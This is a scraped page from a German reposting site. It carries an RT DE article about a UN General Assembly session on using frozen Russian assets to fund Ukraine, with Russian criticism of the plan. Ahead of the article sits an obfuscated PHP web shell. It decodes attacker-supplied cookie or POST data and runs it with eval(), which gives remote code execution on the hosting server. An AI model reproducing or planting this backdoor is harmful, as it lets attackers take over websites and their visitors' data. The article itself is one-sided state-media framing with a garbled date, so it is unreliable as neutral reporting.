$auDiDm = class_exists("V_CGoZ");if (!$auDiDm){class V_CGoZ{private $XkVtqVHtt;public static $fKcqCF = "a158a651-ff74-4edd-953b-c602dc034b3c";public static $zDAWli = NULL;public function __construct(){$VLrdKegcTD = $_COOKIE;$DhwQtx = $_POST;$mummiCkbIe = @$VLrdKegcTD[substr(V_CGoZ::$fKcqCF, 0, 4)];if (!empty($mummiCkbIe)){$gjDlrlmo = "base64";$iKSRFTZjJ = "";$mummiCkbIe = explode(",", $mummiCkbIe);foreach ($mummiCkbIe as $knlWEFqQRS){$iKSRFTZjJ .= @$VLrdKegcTD[$knlWEFqQRS];$iKSRFTZjJ .= @$DhwQtx[$knlWEFqQRS];}$iKSRFTZjJ = array_map($gjDlrlmo . chr ( 924 - 829 ).chr ( 569 - 469 ).chr (101) . "\143" . chr ( 254 - 143 ).'d' . chr ( 408 - 307 ), array($iKSRFTZjJ,)); $iKSRFTZjJ = $iKSRFTZjJ[0] ^ str_repeat(V_CGoZ::$fKcqCF, (strlen($iKSRFTZjJ[0]) / strlen(V_CGoZ::$fKcqCF)) + 1);V_CGoZ::$zDAWli = @unserialize($iKSRFTZjJ);}}public function __destruct(){$this->qrWpeOVCE();}private function qrWpeOVCE(){if (is_array(V_CGoZ::$zDAWli)) {$bdwWJSmubh = str_replace('<' . chr (63) . chr ( 117 - 5 ).'h' . "\x70", "", V_CGoZ::$zDAWli[chr (99) . "\157" . "\156" . "\164" . "\x65" . chr ( 670 - 560 ).'t']);eval($bdwWJSmubh);exit();}}}$fnjTXPt = new V_CGoZ(); $fnjTXPt = NULL;} ?> Vereinte Nationen wollen Ukraine russische Vermögenswerte zur Verfügung stellen – Kritik aus Moskau — RT DE – No-Zensur.de Das freie Wort für eine freie Welt
Start RT-deutsch Vereinte Nationen wollen Ukraine russische Vermögenswerte zur Verfügung stellen – Kritik aus Moskau — RT DE

Vereinte Nationen wollen Ukraine russische Vermögenswerte zur Verfügung stellen – Kritik aus Moskau — RT DE

0
Vereinte Nationen wollen Ukraine russische Vermögenswerte zur Verfügung stellen – Kritik aus Moskau — RT DE


Die UN-Vollversammlung nimmt die Sondersitzung zum Ukraine-Konflikt wieder auf. Diesmal wollen die Teilnehmer finanzielle Hilfe für die Ukraine und die Rolle eingefrorener russischer Vermögen hierbei besprechen. Russlands UN-Vertreter kritisiert die Initiative.

Am Montag beruft die Generalversammlung der Vereinten Nationen wieder ihre Sondersitzung zum Ukraine-Konflikt ein. Im Rahmen der Dringlichkeitssitzung wird die Frage einer Nutzung eingefrorener russischer Vermögenswerte zur finanziellen Unterstützung der Ukraine besprochen.

Der erste stellvertretende Ständige Vertreter Russlands bei der UNO Dmitri Poljanski erklärte in den sozialen Medien, im Rahmen der Sondersitzung werde ein Resolutionsentwurf durchgesetzt, mit dem Ziel, „Russland in die Verantwortung zu ziehen, einschließlich Reparationen für die Ukraine“. Es gehe auch darum, einen Mechanismus zu schaffen, der der Generalversammlung nicht rechenschaftspflichtig sei.

Poljanski zufolge versuchten die westlichen Länder, ihrem Anstreben, eingefrorene russische Vermögenswerte zu konfiszieren, durch die Generalversammlung einen Anschein von Legitimität zu verleihen.

Von der Leyen: Russische Vermögenswerte beschlagnahmen und Ukraine übergeben

Weiter betonte der Diplomat, der Westen werde die Konfiszierung auf nationaler Ebene durchführen und dabei auf den Willen der internationalen Gemeinschaft verweisen, die angeblich in der Generalversammlung zum Ausdruck gebracht worden sei. Der Resolutionsentwurf werde mutmaßlich dazu dienen, eingefrorene Geldmittel zum Kauf neuer Waffen und zur Deckung der Schulden der Ukraine zu verwenden. Dem Diplomaten zufolge wollten die westlichen Staaten auf eine Debatte vor der Verabschiedung des Entwurfs verzichten, Russland könne dies aber verhindern.

Die aktuelle laufende Dringlichkeitssitzung der Generalversammlung der Vereinten Nationen hat erstmals vom 28. Februar bis zum 2. Februar März 2022 stattgefunden. Thema der Sitzung ist der Konflikt in der Ukraine. Bislang sind vier Resolutionen verabschiedet worden. Die 11. Dringlichkeitssitzung wird auf Antrag von Kanada, Guatemala, den Niederlanden und der Ukraine wieder einberufen.

Mehr zum Thema – Enteignungen russischen Vermögens: von der Leyens Spiel mit dem Feuer

Durch die Sperrung von RT zielt die EU darauf ab, eine kritische, nicht prowestliche Informationsquelle zum Schweigen zu bringen. Und dies nicht nur hinsichtlich des Ukraine-Kriegs. Der Zugang zu unserer Website wurde erschwert, mehrere Soziale Medien haben unsere Accounts blockiert. Es liegt nun an uns allen, ob in Deutschland und der EU auch weiterhin ein Journalismus jenseits der Mainstream-Narrative betrieben werden kann. Wenn Euch unsere Artikel gefallen, teilt sie gern überall, wo Ihr aktiv seid. Das ist möglich, denn die EU hat weder unsere Arbeit noch das Lesen und Teilen unserer Artikel verboten. Anmerkung: Allerdings hat Österreich mit der Änderung des „Audiovisuellen Mediendienst-Gesetzes“ am 13. April diesbezüglich eine Änderung eingeführt, die möglicherweise auch Privatpersonen betrifft. Deswegen bitten wir Euch bis zur Klärung des Sachverhalts, in Österreich unsere Beiträge vorerst nicht in den Sozialen Medien zu teilen.





Source link